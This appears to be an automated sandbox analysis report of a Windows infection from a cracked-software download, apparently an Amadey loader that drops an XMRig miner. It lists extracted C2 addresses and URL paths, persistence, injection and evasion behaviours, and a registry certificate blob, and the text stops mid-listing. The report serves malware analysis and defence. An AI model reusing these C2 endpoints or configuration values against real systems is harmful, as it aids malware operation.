Analysis
-
max time kernel
218s -
max time network
219s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
18/12/2024, 22:47
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
amadey
5.10
7ff894
http://185.208.158.116
http://185.209.162.226
-
install_dir
5ce3f566dd
-
install_file
Gxtuum.exe
-
strings_key
ab76263a4c4ffd38c0300987d14cb704
-
url_paths
/bVoZEtTa1/index.php
/bVoZEtTa3/index.php
Signatures
-
Amadey family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1940 created 1088 1940 11088582 49 -
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/3356-1280-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1282-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1285-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1286-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1284-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1283-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1279-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/3356-1287-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
pid Process 3336 powershell.exe 1892 powershell.exe -
Executes dropped EXE 12 IoCs
pid Process 2036 Launcher.exe 620 Launcher.exe 2176 wget.exe 4784 winrar.exe 1940 11088582 4820 wget.exe 4420 winrar.exe 1372 22040691 4164 Ide.com 4732 fd3cd35a12.exe 2792 Officials.com 492 Officials.com -
Loads dropped DLL 1 IoCs
pid Process 3992 rundll32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 44 bitbucket.org 44 raw.githubusercontent.com 49 bitbucket.org 52 raw.githubusercontent.com 16 bitbucket.org 30 bitbucket.org 35 bitbucket.org -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 1940 tasklist.exe 3820 tasklist.exe 4624 tasklist.exe 3304 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1940 11088582 1940 11088582 -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2792 set thread context of 492 2792 Officials.com 150 PID 492 set thread context of 3356 492 Officials.com 152 -
resource yara_rule behavioral1/memory/3356-1275-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1280-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1282-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1285-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1286-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1284-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1283-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1278-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1277-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1279-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1276-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1274-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/3356-1287-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\SportsMichigan 22040691 File opened for modification C:\Windows\DirtyBaseline 22040691 File opened for modification C:\Windows\IncTelevisions 22040691 File opened for modification C:\Windows\CarefulIndiana fd3cd35a12.exe File opened for modification C:\Windows\LionLies fd3cd35a12.exe File opened for modification C:\Windows\BookmarkVariations fd3cd35a12.exe File opened for modification C:\Windows\CleanersBrussels fd3cd35a12.exe File opened for modification C:\Windows\WalkingOpens fd3cd35a12.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4816 3992 WerFault.exe 146 -
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11088582 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22040691 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd3cd35a12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ide.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings taskmgr.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Launcher.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\bandicam-crack.zip:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 804 schtasks.exe 236 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4904 msedge.exe 4904 msedge.exe 1064 msedge.exe 1064 msedge.exe 1816 msedge.exe 1816 msedge.exe 584 identity_helper.exe 584 identity_helper.exe 4552 msedge.exe 4552 msedge.exe 3336 powershell.exe 3336 powershell.exe 1892 powershell.exe 1892 powershell.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 1940 11088582 1940 11088582 2760 taskmgr.exe 2760 taskmgr.exe 1940 11088582 1940 11088582 1940 11088582 1940 11088582 4800 svchost.exe 4800 svchost.exe 4800 svchost.exe 4800 svchost.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3352 7zFM.exe 2760 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeRestorePrivilege 3352 7zFM.exe Token: 35 3352 7zFM.exe Token: SeSecurityPrivilege 3352 7zFM.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 2760 taskmgr.exe Token: SeSystemProfilePrivilege 2760 taskmgr.exe Token: SeCreateGlobalPrivilege 2760 taskmgr.exe Token: SeDebugPrivilege 1940 tasklist.exe Token: SeDebugPrivilege 3820 tasklist.exe Token: SeDebugPrivilege 4624 tasklist.exe Token: SeDebugPrivilege 3304 tasklist.exe Token: SeLockMemoryPrivilege 3356 dwm.exe Token: SeLockMemoryPrivilege 3356 dwm.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 3352 7zFM.exe 3352 7zFM.exe 2176 wget.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 1064 msedge.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 4164 Ide.com 4164 Ide.com 4164 Ide.com 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe 2760 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1064 wrote to memory of 1480 1064 msedge.exe 77 PID 1064 wrote to memory of 1480 1064 msedge.exe 77 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4888 1064 msedge.exe 78 PID 1064 wrote to memory of 4904 1064 msedge.exe 79 PID 1064 wrote to memory of 4904 1064 msedge.exe 79 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 msedge.exe 80 PID 1064 wrote to memory of 2036 1064 